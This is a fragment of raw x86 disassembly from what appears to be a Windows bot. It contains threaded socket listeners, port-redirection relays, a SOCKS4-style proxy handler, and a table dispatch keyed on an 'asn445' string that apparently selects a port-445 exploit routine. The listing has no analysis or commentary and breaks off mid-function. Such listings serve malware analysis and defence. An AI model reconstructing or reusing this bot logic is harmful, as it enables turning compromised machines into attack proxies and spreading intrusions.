lea eax, [ebp+var_28C]
push offset unk_426AD4
push eax
call sub_415480
add esp, 18h
lea eax, [ebp+var_28C]
push eax
lea eax, dword_43BCC0[ebx]
push eax
call sub_415480
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_405D10
add esp, 14h
cmp eax, 1
jnz loc_405FA6
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_405EFA
push offset dword_4345E8
call ds:dword_4220A4 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_426A9C
push eax
call sub_415480
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_405EDC
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_405ED0
lea eax, [ebp+var_140]
loc_405ED0: ; CODE XREF: sub_405DAD+11B�j
push eax
push [ebp+var_40]
call sub_40BAE7
add esp, 14h
loc_405EDC: ; CODE XREF: sub_405DAD+100�j
lea eax, [ebp+var_28C]
push eax
call sub_40A5B3
mov [esp+2A8h+var_2A8], offset dword_4345E8
call ds:dword_4220A0 ; RtlLeaveCriticalSection
jmp loc_405FA6
; ---------------------------------------------------------------------------
loc_405EFA: ; CODE XREF: sub_405DAD+D0�j
push edi
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_415480
mov eax, [ebp+var_20]
pop ecx
imul eax, 3Ch
pop ecx
add eax, offset aAsn445 ; "asn445"
push eax
lea eax, [ebp+var_178]
push eax
call sub_415480
cmp [ebp+var_C0], 0
pop ecx
pop ecx
lea eax, [ebp+var_C0]
jnz short loc_405F3F
lea eax, [ebp+var_140]
loc_405F3F: ; CODE XREF: sub_405DAD+18A�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_415480
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call ds:off_426624[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_405FA6: ; CODE XREF: sub_405DAD+C6�j
; sub_405DAD+148�j
push 7D0h
call ds:dword_422054 ; Sleep
jmp loc_405DF4
; ---------------------------------------------------------------------------
loc_405FB6: ; CODE XREF: sub_405DAD+55�j
push esi
call sub_415248
pop ecx
push 0
call ds:dword_422044 ; ExitThread
sub_405DAD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FC5 proc near ; DATA XREF: sub_40D2E0+3300�o
; sub_40D2E0+5137�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call ds:dword_4364A8 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov ds:dword_4325E8[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_405898
push 8
call sub_415174
add esp, 150h
cmp eax, ebx
jnz short loc_406093
mov esi, offset dword_4345E8
push esi
call ds:dword_4220AC ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4220A8 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_406093
lea eax, [ebp+var_1CC]
push offset unk_426C08
push eax
call sub_415480
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40607D
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40BAE7
add esp, 14h
loc_40607D: ; CODE XREF: sub_405FC5+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_40A5B3
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_406093: ; CODE XREF: sub_405FC5+63�j
; sub_405FC5+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_422054
mov edi, ebx
mov ds:dword_4325EC[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_406160
loc_4060B1: ; CODE XREF: sub_405FC5+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_426BC0
push eax
call sub_415480
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_414F2C
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov ds:dword_43BEC4[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_405DAD
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_40612B
loc_406120: ; CODE XREF: sub_405FC5+164�j
cmp [ebp+var_4], ebx
jnz short loc_406152
push 1Eh
call esi ; Sleep
jmp short loc_406120
; ---------------------------------------------------------------------------
loc_40612B: ; CODE XREF: sub_405FC5+159�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_426B74
push eax
call sub_415480
lea eax, [ebp+var_1CC]
push eax
call sub_40A5B3
add esp, 10h
loc_406152: ; CODE XREF: sub_405FC5+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_4060B1
loc_406160: ; CODE XREF: sub_405FC5+E6�j
cmp [ebp+var_30], ebx
jz loc_40620A
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_406175: ; CODE XREF: sub_405FC5+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, ds:dword_4325E8[eax*8]
push eax
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_426B20
push eax
call sub_415480
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_4061C3
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40BAE7
add esp, 14h
loc_4061C3: ; CODE XREF: sub_405FC5+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_40A5B3
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov ds:dword_4325EC[eax*8], ebx
call esi ; Sleep
push 8
call sub_415174
cmp eax, 1
pop ecx
jnz short loc_4061FA
push offset dword_4345E8
call ds:dword_4220AC ; RtlDeleteCriticalSection
loc_4061FA: ; CODE XREF: sub_405FC5+228�j
push [ebp+var_2C]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_40620A: ; CODE XREF: sub_405FC5+19E�j
; sub_405FC5+25D�j
mov eax, [ebp+var_2C]
cmp ds:dword_4325EC[eax*8], 1
jnz loc_406175
push 7D0h
call esi ; Sleep
jmp short loc_40620A
sub_405FC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406224 proc near ; DATA XREF: sub_40D2E0+36DD�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+var_10]
push ebx
push esi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call ds:dword_436468 ; htons
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call ds:dword_4364E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_406388
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov ds:dword_43BECC[eax], ebx
call ds:dword_436384 ; WSAAsyncSelect
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_436494 ; bind
test eax, eax
jnz loc_406388
push 0Ah
push ebx
call ds:dword_436490 ; listen
test eax, eax
jnz loc_406388
loc_4062CE: ; CODE XREF: sub_406224+BE�j
; sub_406224+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_4364FC ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4062CE
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset unk_426C9C
push eax
call sub_415480
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_414F2C
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_43BEC4[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_4063AC
push esi
push esi
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_43BED4[ecx], eax
jz short loc_406373
loc_406360: ; CODE XREF: sub_406224+14D�j
cmp [ebp+var_2C], esi
jnz loc_4062CE
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_406360
; ---------------------------------------------------------------------------
loc_406373: ; CODE XREF: sub_406224+13A�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_426C50
call sub_40A627
pop ecx
pop ecx
jmp short loc_40638B
; ---------------------------------------------------------------------------
loc_406388: ; CODE XREF: sub_406224+61�j
; sub_406224+93�j ...
mov edi, [ebp+arg_0]
loc_40638B: ; CODE XREF: sub_406224+162�j
push edi
call ds:dword_436500 ; closesocket
push ebx
call ds:dword_436500 ; closesocket
push [ebp+var_3C]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
pop ebx
sub_406224 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063AC proc near ; DATA XREF: sub_406224+11C�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_415D00
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call ds:dword_4364E8 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_406562
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call ds:dword_436468 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call ds:dword_4364A8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40643C
lea eax, [ebp+var_13C]
push eax
call ds:dword_4364EC ; gethostbyname
jmp short loc_40644A
; ---------------------------------------------------------------------------
loc_40643C: ; CODE XREF: sub_4063AC+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_436420 ; gethostbyaddr
loc_40644A: ; CODE XREF: sub_4063AC+8E�j
cmp eax, edi
jz loc_406562
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_436410 ; connect
cmp eax, 0FFFFFFFFh
jz loc_406562
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_426D44
push eax
call sub_415480
push esi
lea eax, [ebp+var_344]
push 10h
push eax
call sub_414F2C
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_43BECC[ebx]
mov ds:dword_43BEC4[eax], ecx
add esp, 20h
mov ecx, [esi]
mov ds:dword_43BED0[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_406593
push edi
push edi
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov ds:dword_43BED4[ecx], eax
jz short loc_40654F
loc_4064FC: ; CODE XREF: sub_4063AC+15D�j
cmp [ebp+var_20], edi
jnz short loc_40650B
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_4064FC
; ---------------------------------------------------------------------------
loc_40650B: ; CODE XREF: sub_4063AC+153�j
mov ebx, 1000h
loc_406510: ; CODE XREF: sub_4063AC+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call ds:dword_436480 ; recv
cmp eax, edi
jle short loc_406562
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_406510
jmp short loc_406562
; ---------------------------------------------------------------------------
loc_40654F: ; CODE XREF: sub_4063AC+14E�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_426CF4
call sub_40A627
pop ecx
pop ecx
loc_406562: ; CODE XREF: sub_4063AC+44�j
; sub_4063AC+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push ds:dword_43BECC[eax]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call ds:dword_436500 ; closesocket
push [ebp+var_4]
call sub_415248
pop ecx
push edi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
pop ebx
sub_4063AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406593 proc near ; DATA XREF: sub_4063AC+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_415D00
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_4065CA: ; CODE XREF: sub_406593+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push ds:dword_43BED0[esi]
call ds:dword_436480 ; recv
test eax, eax
jle short loc_406611
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push ds:dword_43BECC[esi]
call ds:dword_4364B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4065CA
loc_406611: ; CODE XREF: sub_406593+61�j
push ds:dword_43BED0[esi]
call ds:dword_436500 ; closesocket
push [ebp+var_14]
call sub_415248
pop ecx
push 0
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_406593 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406630 proc near ; DATA XREF: sub_40D2E0+5E51�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call ds:dword_436468 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call ds:dword_4364E8 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov ds:dword_43BECC[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_436494 ; bind
test eax, eax
jnz loc_4067D2
push 0Ah
push edi
call ds:dword_436490 ; listen
test eax, eax
jnz loc_4067D2
push [ebp+var_40]
push [ebp+var_D4]
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset unk_426E74
push eax
call sub_415480
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_40670B
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40BAE7
add esp, 14h
loc_40670B: ; CODE XREF: sub_406630+B9�j
; sub_406630+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_40A5B3
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_4364FC ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset unk_426E20
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2D4]
push 11h
push eax
call sub_414F2C
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_43BEC4[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_406835
push esi
push esi
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_43BED4[ecx], eax
jz short loc_4067B2
loc_40679F: ; CODE XREF: sub_406630+180�j
cmp [ebp+var_28], esi
jnz loc_40670B
push 5
call ds:dword_422054 ; Sleep
jmp short loc_40679F
; ---------------------------------------------------------------------------
loc_4067B2: ; CODE XREF: sub_406630+16D�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset unk_426DD8
push eax
call sub_415480
add esp, 0Ch
jmp loc_40670B
; ---------------------------------------------------------------------------
loc_4067D2: ; CODE XREF: sub_406630+7B�j
; sub_406630+8C�j
push edi
call ds:dword_436500 ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset unk_426D98
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_406815
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40BAE7
add esp, 14h
loc_406815: ; CODE XREF: sub_406630+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_40A5B3
push [ebp+var_3C]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
pop ebx
sub_406630 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406835 proc near ; DATA XREF: sub_406630+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_43BECC[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call ds:dword_436450 ; select
test eax, eax
jnz short loc_4068B6
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_4068B6: ; CODE XREF: sub_406835+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call ds:dword_436480 ; recv
test eax, eax
jg short loc_4068E7
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_4068E7: ; CODE XREF: sub_406835+98�j
cmp [ebp+var_4D0], 4
jnz loc_406AE1
cmp [ebp+var_4CF], 1
jnz loc_406AE1
cmp [ebp+var_44], bl
jz short loc_40697D
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40697D
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset unk_426F48
call sub_40A627
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_415500
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4364B8 ; send
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_40697D: ; CODE XREF: sub_406835+CF�j
; sub_406835+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_415500
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call ds:dword_4364E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_406A15
call ds:dword_4363FC ; WSAGetLastError
push eax
push offset unk_426EFC
call sub_40A627
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_415500
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4364B8 ; send
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_406A15: ; CODE XREF: sub_406835+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call ds:dword_436410 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_406A84
call ds:dword_4363FC ; WSAGetLastError
push eax
push offset unk_426EAC
call sub_40A627
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_415500
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4364B8 ; send
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_406A84: ; CODE XREF: sub_406835+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4364B8 ; send
push dword ptr [esi]
push edi
call sub_406AF9
pop ecx
pop ecx
push edi
call ds:dword_436500 ; closesocket
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_406AE1: ; CODE XREF: sub_406835+B9�j
; sub_406835+C6�j
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
sub_406835 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AF9 proc near ; CODE XREF: sub_406835+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_406B0F: ; CODE XREF: sub_406AF9+C5�j
; sub_406AF9+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_406B27: ; CODE XREF: sub_406AF9+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_406B37
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_406B27
loc_406B37: ; CODE XREF: sub_406AF9+33�j
cmp ecx, 1
jnz short loc_406B4C
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_406B4C: ; CODE XREF: sub_406AF9+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call ds:dword_436450 ; select
lea eax, [ebp+var_104]
push eax
push ebx
call ds:dword_436360 ; __WSAFDIsSet
test eax, eax
jz short loc_406BAC
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call ds:dword_436480 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_406BF4
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_406BF4
loc_406BAC: ; CODE XREF: sub_406AF9+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call ds:dword_436360 ; __WSAFDIsSet
test eax, eax
jz loc_406B0F
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call ds:dword_436480 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_406BF4
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call ds:dword_4364B8 ; send
cmp eax, 0FFFFFFFFh
jnz loc_406B0F
loc_406BF4: ; CODE XREF: sub_406AF9+9A�j
; sub_406AF9+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406AF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BF9 proc near ; CODE XREF: sub_40D2E0+45AF�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
